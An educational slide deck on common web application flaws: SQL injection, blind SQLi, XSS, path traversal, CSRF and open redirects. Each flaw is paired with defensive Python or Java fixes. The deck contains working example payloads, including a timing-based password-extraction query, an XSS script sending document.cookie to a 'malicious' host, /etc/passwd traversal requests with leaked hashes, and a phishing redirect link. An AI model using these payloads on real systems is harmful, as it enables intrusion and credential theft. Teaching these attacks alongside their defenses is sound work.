
Most dangerous web application errors
Security of Information Systems
Agenda
1. SQL Injection
2. Cross Site Scripting (XSS)
3. Path Traversal
4. Cross Site Request Forgery (CSRF)
5. Unvalidated Redirect
SQL Injection
http://example.com/items.php?id=2
SELECT title, description, body FROM items WHERE ID = 2
http://example.com/items.php?id=2 or 1=2
SELECT title, description, body
FROM items WHERE ID = 2 or 1=2
SQL Injection (Blind)
IF(expression, true, false)
UNION SELECT
IF(SUBSTRING(user_password,1,1) = CHAR(50), -- expression
BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')), -- true
null) -- false
FROM users WHERE user_id = 1;
http://example.com/items.php?id=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50), BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')), null) FROM users WHERE user_id = 1;
If the database response took a long time, we may expect that the first character of the password of the user with user_id = 1 is '2'.
SQL Injection
Defense
» Prepared Statements (Parameterized Queries)
String query = "SELECT account_balance FROM user_data WHERE user_name = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, name);
» Stored Procedures
CallableStatement cs = connection.prepareCall("{call accountBalance(?)}");
cs.setString(1, custname);
» Escaping all user supplied input
Cross Site Scripting
http://example.com/img?src=url
<img src="url">
http://example.com/img?src=dont.exists" onerror="alert(1)
<img src="dont.exists" onerror="alert(1)">
http://example.com/filename
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
Not found: filename
http://example.com/<script type=text/javascript>i=new Image(); i.src='http://malicious/'+document.cookie</script>
Not found: <script type=text/javascript>
i=new Image();
i.src='http://malicious/'+document.cookie
</script>
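Output encoding for both reflections shown above (the img src attribute and the echoed request path), as an added example that is not from the original deck; it parses the produced markup with Python's html.parser to show which tags and attributes a browser would actually act on.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    # Records every start tag with its attributes, i.e. what a browser would act on
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def img_tag_vulnerable(src):
    # As on the slide: the src query parameter is pasted straight into the attribute
    return '<img src="' + src + '">'


def img_tag_safe(src):
    # Attribute context: encode &, <, >, " and ' and keep the attribute quoted,
    # so a closing quote in the input cannot terminate the attribute
    return '<img src="' + html.escape(src, quote=True) + '">'


def not_found_vulnerable(request_uri):
    # As in the PHP snippet: the decoded request path is echoed unchanged
    return "Not found: " + request_uri


def not_found_safe(request_uri):
    # Element-content context: encode before echoing, so <script> stays text
    return "Not found: " + html.escape(request_uri, quote=True)
```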
Path Traversal
http://example.com/get.php?file=report.pdf
http://example.com/get.php?file=get.php
http://example.com/get.php?file=../get.php
http://example.com/get.php?file=/etc/passwd
Path Traversal
<?php
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
    $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/php/templates/" . $template );
?>
Path Traversal
Request
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Response
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
php:f8fk3j1OIf31.:182:100:Developer:/home/users/php/:/bin/csh
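A containment check for the template include above, as an added example that is not from the original deck; it uses a constructed temporary directory in place of /home/users/php/templates/ and Python's os.path.realpath to canonicalise the requested path before deciding whether to serve it.

```python
import os
import tempfile


def make_template_dir():
    # Constructed stand-in for /home/users/php/templates/ holding the default template
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "blue.php"), "w") as fh:
        fh.write("<h1>blue</h1>")
    return base


def resolve_template(base_dir, template_name, default="blue.php"):
    """Return the file to include for the TEMPLATE cookie, or None to refuse.

    Replaces the unchecked string concatenation in the PHP above: the path is
    joined, canonicalised, and then required to still lie inside base_dir.
    """
    if not template_name:
        template_name = default
    base = os.path.realpath(base_dir)
    # realpath collapses every ".." and resolves symlinks; os.path.join also
    # discards base_dir when template_name is absolute (the file=/etc/passwd
    # case), so the containment check must run on the canonical result
    candidate = os.path.realpath(os.path.join(base, template_name))
    if os.path.commonpath([base, candidate]) != base:
        return None  # ../../../etc/passwd or /etc/passwd: escaped the directory
    if not os.path.isfile(candidate):
        return None  # no such template
    return candidate
```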
Cross Site Request Forgery
Alice sends $100 to Bob
POST http://bank.com/transfer.do HTTP/1.1
...
Content-Length: 19;
account=BOB&amount=100
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
What if...?
GET http://bank.com/transfer.do?acct=MARIA&amount=100000 HTTP/1.1
What if Alice gets an email from Maria?
Hello Alice!
<a href=http://bank.com/transfer.do?acct=MARIA&amount=100000>
View my pictures!
</a>
What if Alice opens a malicious website?
<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000"
width="1" height="1" border="0">
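The transfer.do handler with the two controls that stop the link and <img> requests above (no state change on GET, and a per-session anti-CSRF token checked on POST), as an added example that is not from the original deck; the Session class and the form markup are constructed stand-ins for the bank's own.

```python
import hmac
import secrets


class Session:
    # Constructed server-side session for one logged-in user
    def __init__(self, balance):
        self.balance = balance
        # Unguessable and bound to this session; only pages that bank.com
        # serves to Alice's browser ever contain it
        self.csrf_token = secrets.token_urlsafe(32)


def render_transfer_form(session):
    # The legitimate form carries the token; a link or <img> on Maria's
    # page or in her email cannot read it
    return ('<form method="POST" action="/transfer.do">'
            f'<input type="hidden" name="csrf" value="{session.csrf_token}">'
            '<input name="acct"><input name="amount"><button>Send</button></form>')


def transfer(session, method, params):
    """Handle /transfer.do. Returns (accepted, message)."""
    if method != "POST":
        # <a href=...> and <img src=...> can only produce GET requests
        return False, "transfer requires POST"
    token = params.get("csrf", "")
    if not hmac.compare_digest(token, session.csrf_token):
        # A cross-site form post still carries Alice's cookie, but not her token
        return False, "missing or invalid CSRF token"
    amount = int(params.get("amount", "0"))
    if amount <= 0 or amount > session.balance:
        return False, "invalid amount"
    session.balance -= amount
    return True, f"sent {amount} to {params['acct']}"
```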
Unvalidated Redirect
$redirect_url = $_GET['redir'];
header("Location: " . $redirect_url);
Unvalidated Redirect
Email to Alice:
Greetings from your Bank!
Internet Banking Log In
<a href="https://www.53.com/?a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir=www.evilbank.com&param=F1czz0Kz00lL_5g">
Internet Banking Log In
</a>
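A replacement for the header("Location: " . $_GET['redir']) line above that only follows site-relative paths or https URLs on an allowlisted host, as an added example that is not from the original deck; the ALLOWED_HOSTS set is an assumption.

```python
from urllib.parse import urlparse

# Hosts the bank is willing to redirect to (assumption: its own site only)
ALLOWED_HOSTS = {"www.53.com"}


def safe_redirect_target(redir, fallback="/"):
    """Return a Location value that stays on the bank's site, or fallback.

    Hypothetical replacement for header("Location: " . $_GET['redir']):
    accept only a site-relative path or an https URL on an allowlisted host.
    """
    if not redir:
        return fallback
    parsed = urlparse(redir)
    if parsed.scheme == "" and parsed.netloc == "":
        # Path-only value. "//host" and "/\host" are read by browsers as a new
        # host, so require exactly one leading slash.
        if redir.startswith("/") and not redir.startswith(("//", "/\\")):
            return redir
        return fallback  # e.g. "www.evilbank.com" from the phishing mail
    # Absolute URL: hostname drops user-info and port, so a lookalike such as
    # "https://www.53.com@www.evilbank.com/" is compared as www.evilbank.com
    if parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS:
        return redir
    return fallback
```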
Thank you
https://www.owasp.org/index.php/Blind_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/Path_Traversal
https://www.owasp.org/index.php/CSRF
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://www.53.com/site/global/ib-login.html
